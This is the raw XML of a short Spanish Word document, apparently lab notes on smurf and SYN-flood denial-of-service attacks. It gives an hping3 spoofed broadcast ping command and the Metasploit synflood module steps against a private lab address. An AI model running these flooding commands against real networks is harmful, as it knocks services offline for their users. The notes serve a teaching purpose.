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6AB" w:rsidRPr="007E76AB" w:rsidRDefault="007E76AB" w:rsidP="007E76AB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="2D323A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7E76AB">
        <w:rPr>
          <w:rFonts w:ascii="__IBM_Plex_Sans_Fallback_c3621c" w:eastAsia="Times New Roman" w:hAnsi="__IBM_Plex_Sans_Fallback_c3621c" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C4C8CE"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>Ataques Smurf y DoS con Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E76AB" w:rsidRPr="007E76AB" w:rsidRDefault="007E76AB" w:rsidP="007E76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7E76AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hrstd="t" o:hrnoshade="t" o:hr="t" fillcolor="#c4c8ce" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E76AB" w:rsidRPr="007E76AB" w:rsidRDefault="007E76AB" w:rsidP="007E76AB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="2D323A"/>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1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7E76AB">
        <w:rPr>
          <w:rFonts w:ascii="__IBM_Plex_Sans_Fallback_c3621c" w:eastAsia="Times New Roman" w:hAnsi="__IBM_Plex_Sans_Fallback_c3621c" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C4C8CE"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>Smurf</w:t>
      </w:r>
      <w:r w:rsidRPr="007E76AB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 El ataque pitufo o ataque smurf es un ataque de denegación de servicio que utiliza mensajes de ping al broadcast con spoofing para inundar (flood) un objetivo (sistema atacado).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E76AB" w:rsidRPr="007E76AB" w:rsidRDefault="007E76AB" w:rsidP="007E76AB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="2D323A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7E76AB">
        <w:rPr>
          <w:rFonts w:ascii="__IBM_Plex_Sans_Fallback_c3621c" w:eastAsia="Times New Roman" w:hAnsi="__IBM_Plex_Sans_Fallback_c3621c" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C4C8CE"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>Modelo de ataque amplificado</w:t>
      </w:r>
      <w:r w:rsidRPr="007E76AB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 Utiliza recursos de la red para amplificar la capacidad de procesamiento de la maquina original. Simula un mini DDoS</w:t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5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="187325" cy="187325"/>
            <wp:effectExtent l="0" t="0" r="3175" b="3175"/>
            <wp:docPr id="2" name="Imagen 2" descr="do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o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6AB">
        <w:rPr>
          <w:rFonts w:ascii="__IBM_Plex_Sans_Fallback_c3621c" w:eastAsia="Times New Roman" w:hAnsi="__IBM_Plex_Sans_Fallback_c3621c" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C4C8CE"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>hping3 --icmp -spoof 192.168.10.104 255.255.255.255</w:t>
      </w:r>
      <w:r w:rsidRPr="007E76AB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 Ataque dirigido al broadcast, todas las maquinas disponibles en la red responderán a la solicitud</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="__IBM_Plex_Sans_Fallback_c3621c" w:eastAsia="Times New Roman" w:hAnsi="__IBM_Plex_Sans_Fallback_c3621c" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="C4C8CE"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="187325" cy="187325"/>
            <wp:effectExtent l="0" t="0" r="3175" b="3175"/>
            <wp:docPr id="1" name="Imagen 1" descr="do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os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6AB">
        <w:rPr>
          <w:rFonts w:ascii="__IBM_Plex_Sans_Fallback_c3621c" w:eastAsia="Times New Roman" w:hAnsi="__IBM_Plex_Sans_Fallback_c3621c" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C4C8CE"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>DoS con Metasploit</w:t>
      </w:r>
      <w:r w:rsidRPr="007E76AB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 (Ataque de SYN con IP´s aleatorias) Msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E76AB" w:rsidRPr="007E76AB" w:rsidRDefault="007E76AB" w:rsidP="007E76AB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="2D323A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7E76AB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use auxiliary/dos/tcp/synflood</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E76AB" w:rsidRPr="007E76AB" w:rsidRDefault="007E76AB" w:rsidP="007E76AB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="2D323A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7E76AB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show options</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E76AB" w:rsidRPr="007E76AB" w:rsidRDefault="007E76AB" w:rsidP="007E76AB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="2D323A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7E76AB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set RHOST 192.168.10.104</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E76AB" w:rsidRPr="007E76AB" w:rsidRDefault="007E76AB" w:rsidP="007E76AB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="2D323A"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/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</w:pPr>
      <w:r w:rsidRPr="007E76AB">
        <w:rPr>
          <w:rFonts w:ascii="__IBM_Plex_Sans_Fallback_c3621c" w:eastAsia="Times New Roman" w:hAnsi="__IBM_Plex_Sans_Fallback_c3621c" w:cs="Times New Roman"/>
          <w:color w:val="C4C8CE"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB2342" w:rsidRDefault="007E76AB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IBM_Plex_Sans_Fallback_c3621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F0B5E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9C78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7DF"/>
    <w:rsid w:val="00075EE0"/>
    <w:rsid w:val="007E76AB"/>
    <w:rsid w:val="00E001F3"/>
    <w:rsid w:val="00F4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E76A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7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E76A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7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7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556</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>4</Lines>
  <Paragraphs>1</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>Luffi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2024-07-05T04:18:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-05T04:18:00Z</dcterms:modified>
</cp:coreProperties>
</file>